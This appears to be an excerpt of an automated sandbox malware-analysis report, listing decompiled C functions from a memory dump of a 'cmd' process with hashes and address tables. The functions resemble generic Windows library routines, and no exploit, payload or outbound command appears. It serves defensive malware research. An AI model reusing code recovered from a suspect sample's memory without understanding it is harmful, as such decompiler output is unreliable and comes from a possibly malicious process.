                                                                                                                                          • Opcode Fuzzy Hash: ca5d51645cdc36c350f375154cac890e86e55dabd7fb6545467d34248e78e5c3
                                                                                                                                          • Instruction Fuzzy Hash: 1911CE317207469FCB50EE28C885A2BB7A5FB88614F14057DF952DB650DB20ED50DBD1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C137F5 Relevance: .1, Instructions: 57COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                          			E03C137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03BF2280(_t6, 0x3cc8550);
				}
				_t29 = E03C1387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E03BEFFB0(0x3cc8550, _t27, 0x3cc8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                                                          0x03c137fa
                                                                                                                                          0x03c137fc
                                                                                                                                          0x03c13805
                                                                                                                                          0x03c13808
                                                                                                                                          0x03c13808
                                                                                                                                          0x03c13814
                                                                                                                                          0x03c13818
                                                                                                                                          0x03c13846
                                                                                                                                          0x03c13848
                                                                                                                                          0x03c1384b
                                                                                                                                          0x03c1384b
                                                                                                                                          0x03c13852
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13854
                                                                                                                                          0x03c13856
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13863
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13863
                                                                                                                                          0x03c1381a
                                                                                                                                          0x03c1381a
                                                                                                                                          0x03c1381f
                                                                                                                                          0x03c1386e
                                                                                                                                          0x03c1386e
                                                                                                                                          0x03c13871
                                                                                                                                          0x03c13873
                                                                                                                                          0x03c13873
                                                                                                                                          0x03c13868
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13868
                                                                                                                                          0x03c13821
                                                                                                                                          0x03c13826
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13828
                                                                                                                                          0x03c1382a
                                                                                                                                          0x03c13841
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13841

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 44ff34e2e669eda8dff94bf46bced5e0bc3fcf0fdbc4c768f88d52be634d7c0a
                                                                                                                                          • Instruction ID: bb474e67a722c2075bd16dcfa0414476b215ddcf3bf90a6ba11f8bbe35ba327c
                                                                                                                                          • Opcode Fuzzy Hash: 44ff34e2e669eda8dff94bf46bced5e0bc3fcf0fdbc4c768f88d52be634d7c0a
                                                                                                                                          • Instruction Fuzzy Hash: 5B012BBBA016909BD337DB1A9500E26BBAADF83B5871940AFE509CF240CB70C911E7C0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0002D Relevance: .1, Instructions: 55COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C0002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03BF7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03BF7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03BF7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03BF7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                                                          0x03c00032
                                                                                                                                          0x03c00037
                                                                                                                                          0x03c00043
                                                                                                                                          0x03c44b3a
                                                                                                                                          0x03c00049
                                                                                                                                          0x03c00049
                                                                                                                                          0x03c00049
                                                                                                                                          0x03c0004e
                                                                                                                                          0x03c00053
                                                                                                                                          0x03c44b48
                                                                                                                                          0x03c44b5a
                                                                                                                                          0x03c44b4a
                                                                                                                                          0x03c44b53
                                                                                                                                          0x03c44b53
                                                                                                                                          0x03c44b5f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44b61
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44b61
                                                                                                                                          0x03c00059
                                                                                                                                          0x03c00059
                                                                                                                                          0x03c00060
                                                                                                                                          0x03c44b6f
                                                                                                                                          0x03c44b6f
                                                                                                                                          0x03c00069
                                                                                                                                          0x03c44b83
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44b90
                                                                                                                                          0x03c44b9b
                                                                                                                                          0x03c44b9b
                                                                                                                                          0x03c44ba4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c44baa
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0006f
                                                                                                                                          0x03c0006f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0006f
                                                                                                                                          0x03c00069

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                          • Instruction ID: e6b8a48b5f6011c53ec6138c3f32dfa5c2d245b6a822e23cd85118f57bd480e3
                                                                                                                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                          • Instruction Fuzzy Hash: 3111E176601AD18FD726D72ACA44B3577D8AF40798F2E10F0DD04CF692DF28CA41C260
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE766D Relevance: .1, Instructions: 54COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                          			E03BE766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E03C0F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E03C0F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03BF4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                                                          0x03be7672
                                                                                                                                          0x03be767f
                                                                                                                                          0x03be7689
                                                                                                                                          0x03be76de
                                                                                                                                          0x03be76de
                                                                                                                                          0x03be768b
                                                                                                                                          0x03be7691
                                                                                                                                          0x03be7693
                                                                                                                                          0x03be7697
                                                                                                                                          0x00000000
                                                                                                                                          0x03be7699
                                                                                                                                          0x03be76a8
                                                                                                                                          0x00000000
                                                                                                                                          0x03be76aa
                                                                                                                                          0x03be76ad
                                                                                                                                          0x03be76b1
                                                                                                                                          0x00000000
                                                                                                                                          0x03be76b3
                                                                                                                                          0x03be76b3
                                                                                                                                          0x03be76b5
                                                                                                                                          0x03be76ba
                                                                                                                                          0x03be76bc
                                                                                                                                          0x03be76bc
                                                                                                                                          0x03be76c0
                                                                                                                                          0x00000000
                                                                                                                                          0x03be76c2
                                                                                                                                          0x03be76ce
                                                                                                                                          0x03be76ce
                                                                                                                                          0x03be76c0
                                                                                                                                          0x03be76b1
                                                                                                                                          0x03be76a8
                                                                                                                                          0x03be7697
                                                                                                                                          0x03be76d9

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                          • Instruction ID: 020df675e4211cdc37a7c713efa7bf8479c8c58626bed1bf1e52a411aab4f4c4
                                                                                                                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                          • Instruction Fuzzy Hash: 48017532700119AFC720EE6EDC42E5BB6ADEB84668B1905B4BA08CB250DF30DD0197A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD9080 Relevance: .1, Instructions: 53COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                          			E03BD9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x3cc85ec;
				E03BF2280(_t48, 0x3cc85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E03BEFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x3cc538c; // 0x77576848
					if( *_t84 != 0x3cc5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x3caf6e8);
						E03C2D0E8(0x3cc85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E03CA88F5(_t80, _t85, 0x3cc5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x3cc86c0; // 0x34707b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x3cc86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03BF2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E03CA88F5(0x3cc85ec, _t85, 0x3cc5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E03C1AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x3ccb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x3cc84c0;
																			if(_t82 >=  *0x3cc84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03CA9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E03BD922A(_t99);
										_t64 = E03BF7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03CA8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x3cc86c0; // 0x34707b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x3cc86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x3cc86bc;
													_t87 = 0x3cc86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03BD9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x3cc86c4;
												_t87 = 0x3cc86c0;
												L27:
												E03C09B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E03C2D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3cc5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x3cc538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                                                          0x03bd9082
                                                                                                                                          0x03bd9083
                                                                                                                                          0x03bd9084
                                                                                                                                          0x03bd9085
                                                                                                                                          0x03bd9087
                                                                                                                                          0x03bd9096
                                                                                                                                          0x03bd9098
                                                                                                                                          0x03bd9098
                                                                                                                                          0x03bd909e
                                                                                                                                          0x03bd90a8
                                                                                                                                          0x03bd90e7
                                                                                                                                          0x03bd90e7
                                                                                                                                          0x03bd90aa
                                                                                                                                          0x03bd90b0
                                                                                                                                          0x03bd90b7
                                                                                                                                          0x03bd90bd
                                                                                                                                          0x03bd90dd
                                                                                                                                          0x03bd90e6
                                                                                                                                          0x03bd90bf
                                                                                                                                          0x03bd90bf
                                                                                                                                          0x03bd90c7
                                                                                                                                          0x03bd90cf
                                                                                                                                          0x03bd90f1
                                                                                                                                          0x03bd90f2
                                                                                                                                          0x03bd90f4
                                                                                                                                          0x03bd90f5
                                                                                                                                          0x03bd90f6
                                                                                                                                          0x03bd90f7
                                                                                                                                          0x03bd90f8
                                                                                                                                          0x03bd90f9
                                                                                                                                          0x03bd90fa
                                                                                                                                          0x03bd90fb
                                                                                                                                          0x03bd90fc
                                                                                                                                          0x03bd90fd
                                                                                                                                          0x03bd90fe
                                                                                                                                          0x03bd90ff
                                                                                                                                          0x03bd9100
                                                                                                                                          0x03bd9102
                                                                                                                                          0x03bd9107
                                                                                                                                          0x03bd910c
                                                                                                                                          0x03bd9110
                                                                                                                                          0x03bd9113
                                                                                                                                          0x03bd9115
                                                                                                                                          0x03bd9136
                                                                                                                                          0x03bd913f
                                                                                                                                          0x03bd9143
                                                                                                                                          0x03c337e4
                                                                                                                                          0x03c337e4
                                                                                                                                          0x03bd9117
                                                                                                                                          0x03bd9117
                                                                                                                                          0x03bd911d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd911f
                                                                                                                                          0x03bd911f
                                                                                                                                          0x03bd9125
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9127
                                                                                                                                          0x03bd912d
                                                                                                                                          0x03bd9130
                                                                                                                                          0x03bd9134
                                                                                                                                          0x03bd9158
                                                                                                                                          0x03bd915d
                                                                                                                                          0x03bd9161
                                                                                                                                          0x03bd9168
                                                                                                                                          0x03c33715
                                                                                                                                          0x03bd916e
                                                                                                                                          0x03bd916e
                                                                                                                                          0x03bd9175
                                                                                                                                          0x03bd9177
                                                                                                                                          0x03bd917e
                                                                                                                                          0x03bd917f
                                                                                                                                          0x03bd9182
                                                                                                                                          0x03bd9182
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd918a
                                                                                                                                          0x03bd918d
                                                                                                                                          0x03bd918f
                                                                                                                                          0x03bd9192
                                                                                                                                          0x03bd9195
                                                                                                                                          0x03bd9198
                                                                                                                                          0x03bd9198
                                                                                                                                          0x03bd9198
                                                                                                                                          0x03bd919a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3371f
                                                                                                                                          0x03c33721
                                                                                                                                          0x03c33727
                                                                                                                                          0x03c3372f
                                                                                                                                          0x03c33733
                                                                                                                                          0x03c33735
                                                                                                                                          0x03c33738
                                                                                                                                          0x03c3373b
                                                                                                                                          0x03c3373d
                                                                                                                                          0x03c33740
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33746
                                                                                                                                          0x03c33746
                                                                                                                                          0x03c33749
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3374f
                                                                                                                                          0x03c3374f
                                                                                                                                          0x03c33751
                                                                                                                                          0x03c33757
                                                                                                                                          0x03c33759
                                                                                                                                          0x03c3375c
                                                                                                                                          0x03c3375c
                                                                                                                                          0x03c3375e
                                                                                                                                          0x03c3375e
                                                                                                                                          0x03c33761
                                                                                                                                          0x03c33764
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33766
                                                                                                                                          0x03c33768
                                                                                                                                          0x03c337a3
                                                                                                                                          0x03c337a3
                                                                                                                                          0x03c337a5
                                                                                                                                          0x03c337a7
                                                                                                                                          0x03c337ad
                                                                                                                                          0x03c337b0
                                                                                                                                          0x03c337b2
                                                                                                                                          0x03c337bc
                                                                                                                                          0x03c337c2
                                                                                                                                          0x03c337c2
                                                                                                                                          0x03c337b2
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd918a
                                                                                                                                          0x03bd918d
                                                                                                                                          0x03bd918f
                                                                                                                                          0x03bd9192
                                                                                                                                          0x03bd9195
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9195
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3376a
                                                                                                                                          0x03c3376a
                                                                                                                                          0x03c3376a
                                                                                                                                          0x03c3376c
                                                                                                                                          0x03c3376c
                                                                                                                                          0x03c3376f
                                                                                                                                          0x03c33775
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33777
                                                                                                                                          0x03c33779
                                                                                                                                          0x03c33782
                                                                                                                                          0x03c33787
                                                                                                                                          0x03c33789
                                                                                                                                          0x03c33790
                                                                                                                                          0x03c33790
                                                                                                                                          0x03c3378b
                                                                                                                                          0x03c3378b
                                                                                                                                          0x03c3378b
                                                                                                                                          0x03c33792
                                                                                                                                          0x03c33795
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33795
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33779
                                                                                                                                          0x03c33798
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33798
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33768
                                                                                                                                          0x03c3379b
                                                                                                                                          0x03c3379b
                                                                                                                                          0x03c33751
                                                                                                                                          0x03c33749
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33740
                                                                                                                                          0x03bd91a0
                                                                                                                                          0x03bd91a3
                                                                                                                                          0x03bd91a9
                                                                                                                                          0x03bd91b0
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd91b0
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd91b4
                                                                                                                                          0x03bd91b4
                                                                                                                                          0x03bd91bb
                                                                                                                                          0x03bd91c0
                                                                                                                                          0x03bd91c5
                                                                                                                                          0x03bd91c7
                                                                                                                                          0x03c337da
                                                                                                                                          0x03bd91cd
                                                                                                                                          0x03bd91cd
                                                                                                                                          0x03bd91cd
                                                                                                                                          0x03bd91d2
                                                                                                                                          0x03bd91d5
                                                                                                                                          0x03bd9239
                                                                                                                                          0x03bd9239
                                                                                                                                          0x03bd91d7
                                                                                                                                          0x03bd91db
                                                                                                                                          0x03bd91e1
                                                                                                                                          0x03bd91e7
                                                                                                                                          0x03bd91fd
                                                                                                                                          0x03bd9203
                                                                                                                                          0x03bd921e
                                                                                                                                          0x03bd9223
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9205
                                                                                                                                          0x03bd9205
                                                                                                                                          0x03bd9208
                                                                                                                                          0x03bd920c
                                                                                                                                          0x03bd9214
                                                                                                                                          0x03bd9214
                                                                                                                                          0x03bd920c
                                                                                                                                          0x03bd91e9
                                                                                                                                          0x03bd91e9
                                                                                                                                          0x03bd91ee
                                                                                                                                          0x03bd91f3
                                                                                                                                          0x03bd91f3
                                                                                                                                          0x03bd91f3
                                                                                                                                          0x03bd91e7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9134
                                                                                                                                          0x03bd9125
                                                                                                                                          0x03bd911d
                                                                                                                                          0x03bd914e
                                                                                                                                          0x03bd90d1
                                                                                                                                          0x03bd90d1
                                                                                                                                          0x03bd90d3
                                                                                                                                          0x03bd90d6
                                                                                                                                          0x03bd90d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd90d8
                                                                                                                                          0x03bd90cf

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 69b4dbbf2c7529695aff20dbe9dfee5a954d87e44622ec9acc6512279c14fdf9
                                                                                                                                          • Instruction ID: cad21bd8a7696fbcc635e04e5e5251c57524d3c69e14abc6d97adaa050719800
                                                                                                                                          • Opcode Fuzzy Hash: 69b4dbbf2c7529695aff20dbe9dfee5a954d87e44622ec9acc6512279c14fdf9
                                                                                                                                          • Instruction Fuzzy Hash: 4E01A4B26116049FD325DF19F840B12B7A9EB86728F2940B6E505CF691D374EC41CBD0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C6C450 Relevance: .1, Instructions: 53COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                          			E03C6C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03C19910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E03C195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E03C195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E03C195D0();
				return L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                                                          0x03c6c458
                                                                                                                                          0x03c6c45d
                                                                                                                                          0x03c6c466
                                                                                                                                          0x03c6c468
                                                                                                                                          0x03c6c469
                                                                                                                                          0x03c6c46a
                                                                                                                                          0x03c6c46b
                                                                                                                                          0x03c6c46e
                                                                                                                                          0x03c6c46f
                                                                                                                                          0x03c6c471
                                                                                                                                          0x03c6c476
                                                                                                                                          0x03c6c476
                                                                                                                                          0x03c6c47c
                                                                                                                                          0x03c6c47e
                                                                                                                                          0x03c6c480
                                                                                                                                          0x03c6c480
                                                                                                                                          0x03c6c483
                                                                                                                                          0x03c6c484
                                                                                                                                          0x03c6c486
                                                                                                                                          0x03c6c488
                                                                                                                                          0x03c6c48f
                                                                                                                                          0x03c6c491
                                                                                                                                          0x03c6c493
                                                                                                                                          0x03c6c493
                                                                                                                                          0x03c6c48f
                                                                                                                                          0x03c6c498
                                                                                                                                          0x03c6c49e
                                                                                                                                          0x03c6c4ad
                                                                                                                                          0x03c6c4ad
                                                                                                                                          0x03c6c4b2
                                                                                                                                          0x03c6c4b4
                                                                                                                                          0x03c6c4cd

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
